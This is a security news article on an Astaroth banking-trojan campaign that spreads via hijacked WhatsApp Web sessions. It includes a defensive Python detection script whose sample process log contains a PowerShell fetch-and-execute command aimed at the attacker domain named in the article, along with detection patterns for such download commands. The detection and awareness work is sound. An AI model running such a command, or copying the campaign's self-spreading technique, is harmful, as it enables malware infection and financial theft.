WhatsApp Web Malware Automatically Distributes Banking Trojan to Users


A new malware campaign is exploiting WhatsApp Web to spread Astaroth banking trojan through trusted conversations, posing significant risks to users.

A recent malware campaign is transforming WhatsApp Web into a tool for cybercriminals. Security researchers have identified a banking Trojan linked to Astaroth that spreads automatically through chat messages, complicating efforts to halt the attack once it begins. This campaign, dubbed Boto Cor-de-Rosa, highlights the evolving tactics of cybercriminals who exploit trusted communication platforms.

The attack primarily targets Windows users, utilizing WhatsApp Web as both the delivery mechanism and the means of further spreading the infection. The process begins innocuously with a message from a contact containing what appears to be a harmless ZIP file. The file name is designed to look random and benign, which reduces the likelihood of suspicion.

Inside the ZIP is a Visual Basic Script (VBS) file named to look like an ordinary document. Extracting the archive is harmless in itself; the infection starts when the user double-clicks the script, which Windows hands to its script host. Once running, the script quietly downloads two further components: the Astaroth banking trojan, written in Delphi, and a Python-based module that drives WhatsApp Web from the infected machine. Both operate in the background without any obvious warning signs, and because the second component re-sends the lure to the victim's own contacts, each infection seeds the next. This self-sustaining mechanism is what makes the campaign particularly dangerous.

What sets this campaign apart is its method of propagation. The Python module scans the victim’s WhatsApp contacts and automatically sends the malicious ZIP file to every conversation. Researchers from Acronis have noted that the malware even tailors its messages based on the time of day, often including friendly greetings to make the communication feel familiar. Messages such as “Here is the requested file. If you have any questions, I’m available!” appear to come from trusted contacts, leading many recipients to open them without hesitation.

The malware is also designed to monitor its own effectiveness in real time. The propagation tool tracks the number of successfully delivered messages, failed attempts, and the overall sending speed. After every 50 messages, it generates progress updates, allowing attackers to measure their success quickly and adapt their strategies as needed.

To evade antivirus detection, the initial script is heavily obfuscated. Once run, it launches PowerShell commands that fetch the remaining components from attacker-controlled or compromised websites, including the domain coffe-estilo.com named in the report. The payload is installed in a folder that imitates a Microsoft Edge cache directory, containing the executables and libraries that make up the full Astaroth banking trojan. The disguise cuts both ways: a genuine browser cache holds data files, not .exe or .dll files, so executables launching from such a path are themselves a strong indicator of compromise. From there the malware can steal credentials, monitor user activity, and potentially access financial accounts.
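The chain described in the last few paragraphs (archive, VBS run by a Windows script host, PowerShell download cradle, payload staged in a fake Edge cache folder) shows up in endpoint telemetry as a process tree, and that is where the "script abuse and PowerShell activity" monitoring recommended later in this article actually bites. The following is an added example written for this page, not code from the Acronis report or from the campaign: it runs a handful of detection rules over constructed process-creation records and rolls the indicators up the parent chain, so that the leaf executable in the fake cache folder is judged together with the script host and cradle that spawned it. The log format, process names, PIDs, file names and sample command lines are all invented for illustration; the only detail taken from the article is the coffe-estilo.com domain, used here as an indicator of compromise.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (Sysmon Event ID 1 style), one per line:
# pid|ppid|image path|command line. Sample data written for this example to
# mirror the chain described in the article; not telemetry from the campaign.
# The domain is the one the article names; the URL path is a placeholder.
SAMPLE_LOG = r"""
1000|800|C:\Windows\explorer.exe|C:\Windows\explorer.exe
1204|1000|C:\Windows\System32\wscript.exe|"C:\Windows\System32\wscript.exe" "C:\Users\ana\Downloads\arquivo_8f3k2\documento_8f3k2.vbs"
1310|1204|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://coffe-estilo.com/')"
1422|1310|C:\Users\ana\AppData\Local\Microsoft\Edge\User Data\Default\Cache\svc_core.exe|C:\Users\ana\AppData\Local\Microsoft\Edge\User Data\Default\Cache\svc_core.exe
2000|1000|C:\Program Files\Microsoft\Edge\Application\msedge.exe|"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer
2100|1000|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\Scripts\backup.ps1
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Script file launched from a user-writable location (where archives get extracted).
SCRIPT_FILE = re.compile(r"\\(Downloads|Desktop|Temp)\\.*\.(vbs|vbe|js|jse|wsf)\b", re.I)
# Common PowerShell download / in-memory execution primitives.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Start-BitsTransfer|Invoke-Expression|\biex\b", re.I)
HIDDEN_OR_ENCODED = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)
# A real Edge/Chrome profile cache holds data files, never PE images.
BROWSER_CACHE_PE = re.compile(r"\\(Edge|Chrome)\\User Data\\.*Cache.*\.(exe|dll)$", re.I)
IOC_DOMAINS = {"coffe-estilo.com"}  # indicator quoted in the article


@dataclass(frozen=True)
class Event:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> list[Event]:
    events = []
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        events.append(Event(int(pid), int(ppid), image, cmdline))
    return events


def indicators(events: list[Event]) -> dict[int, list[str]]:
    """Per-process rules; each returns a label when a single event looks off."""
    by_pid = {e.pid: e for e in events}
    hits: dict[int, list[str]] = {}
    for e in events:
        parent = by_pid.get(e.ppid)
        found = []
        if e.name in SCRIPT_HOSTS and SCRIPT_FILE.search(e.cmdline):
            found.append("script_host_running_user_dir_script")
        if e.name in SHELLS and parent is not None and parent.name in SCRIPT_HOSTS:
            found.append("shell_spawned_by_script_host")
        if e.name in SHELLS and CRADLE.search(e.cmdline):
            found.append("download_cradle")
        if e.name in SHELLS and HIDDEN_OR_ENCODED.search(e.cmdline):
            found.append("hidden_or_encoded_powershell")
        if any(d in e.cmdline.lower() for d in IOC_DOMAINS):
            found.append("known_ioc_domain")
        if BROWSER_CACHE_PE.search(e.image):
            found.append("executable_in_browser_cache_path")
        if found:
            hits[e.pid] = found
    return hits


def ancestry(events: list[Event], pid: int) -> list[str]:
    """Process names from the root of the recorded tree down to pid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return list(reversed(chain))


CHAIN_REQUIRED = {"shell_spawned_by_script_host", "download_cradle"}


def triage(events: list[Event]) -> dict[int, dict]:
    """Roll indicators up the parent chain. The staged payload alone is only
    'an exe in an odd folder'; combined with its ancestors it is the full
    script host -> PowerShell cradle -> payload pattern, which is what we flag."""
    hits = indicators(events)
    by_pid = {e.pid: e for e in events}
    flagged: dict[int, dict] = {}
    for pid in hits:
        combined, cur, seen = set(), pid, set()
        while cur in by_pid and cur not in seen:
            seen.add(cur)
            combined |= set(hits.get(cur, ()))
            cur = by_pid[cur].ppid
        if CHAIN_REQUIRED <= combined:
            flagged[pid] = {"chain": ancestry(events, pid), "indicators": sorted(combined)}
    return flagged


if __name__ == "__main__":
    for pid, info in triage(parse_log(SAMPLE_LOG)).items():
        print(pid, " > ".join(info["chain"]), info["indicators"])
```

On the sample data the benign Edge renderer and the scheduled backup script produce no indicators at all, while the PowerShell launched by wscript.exe and the executable started from the fake cache folder are both reported with the full explorer.exe > wscript.exe > powershell.exe chain behind them. The same rules expressed in a SIEM's query language would need the parent-process field, which is exactly why process-creation logging with parent information (Sysmon or Windows security auditing with command-line logging enabled) is worth having before an incident rather than after.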

WhatsApp Web’s popularity stems from its ability to mirror phone conversations on a computer, making it convenient for users to send messages and share files. However, this convenience also introduces significant risks. When users connect their phones to WhatsApp Web by scanning a QR code at web.whatsapp.com, the browser session becomes a trusted extension of their account. This means that if malware gains access to a computer with an active WhatsApp Web session, it can act on behalf of the user, reading messages, accessing contact lists, and sending files that appear legitimate.

This use of WhatsApp Web as a delivery system is what makes the campaign effective. No flaw in WhatsApp itself is exploited, and its end-to-end encryption offers no protection here, because the malicious message is composed and sent from the victim's own legitimate endpoint: the malware simply drives an already authenticated browser session. Many users remain unaware of the exposure, since WhatsApp Web feels harmless and is frequently left signed in on shared or public computers. In that situation the malware needs no sophisticated technique; it only needs to run on a machine with a trusted session open.

To mitigate the risks associated with this type of malware, users should adopt several habits. First and foremost, never open ZIP files sent through chat unless you have confirmed through another channel, such as a phone call, that the sender actually meant to send them. Because the message really does come from the contact's account, a familiar name proves nothing about who composed it. Be cautious of file names that appear random or unfamiliar, and treat messages that create a sense of urgency or forced familiarity as warning signs. If a file arrives unexpectedly, take a moment to verify it before clicking.

Additionally, review the linked devices listed in WhatsApp's settings and log out of any you do not recognize. Avoid leaving WhatsApp Web signed in on shared or public computers, and enable WhatsApp's two-step verification PIN. Be clear about what each control does: two-step verification protects against someone re-registering your number on another phone; it does not revoke a browser session that is already linked, so unlinking unfamiliar devices is the step that actually cuts off a compromised PC. Keeping linked devices to a minimum, and unlinking them when they are not in use, shrinks the surface this kind of malware can use to spread.

Keeping devices updated is also important, though it is worth being precise about what it buys here: this campaign exploits no software vulnerability; it runs because a user double-clicks a script. Windows and browser updates still close the holes other attacks rely on, but the controls that address this chain directly are restricting script hosts (for example, changing the default handler for .vbs files so that double-clicking opens them in Notepad instead of running them with wscript.exe), enabling PowerShell script block logging, and endpoint protection that watches for scripting engines spawning PowerShell and for PowerShell download activity in real time.

Banking malware is often associated with identity theft and financial fraud. To minimize the fallout from such attacks, consider reducing your digital footprint. Data removal services can assist in removing personal information from data broker sites, making it harder for criminals to exploit your details if malware infiltrates your device. While no service can guarantee complete data removal from the internet, these services actively monitor and erase personal information from numerous websites, enhancing your privacy.

Even with robust security measures in place, financial monitoring adds another layer of protection. Identity theft protection services can track suspicious activity related to your credit and personal data, alerting you if your information is being sold on the dark web or used to open unauthorized accounts. Setting up alerts for bank and credit card transactions can help you respond quickly to any irregularities.

Most malware infections occur when users act too quickly. If a message feels suspicious, trust your instincts. Familiar names and friendly language can lower your guard, but they should never replace caution. Taking a moment to verify the authenticity of a message or file can prevent significant damage.

This WhatsApp Web malware campaign serves as a stark reminder that cyberattacks are increasingly sophisticated, often blending seamlessly into everyday conversations. The ease with which this threat can spread from one device to many is alarming. A single click can transform a trusted chat into a vehicle for banking malware and identity theft. Fortunately, simple changes in behavior, such as being vigilant about attachments, securing WhatsApp Web access, keeping devices updated, and exercising caution before clicking, can significantly reduce the risk of falling victim to such attacks.

As messaging platforms continue to play a larger role in our daily lives, maintaining awareness and adopting simple security habits is essential. Do you believe messaging apps are doing enough to protect users from malware that spreads through trusted conversations? Share your thoughts with us.
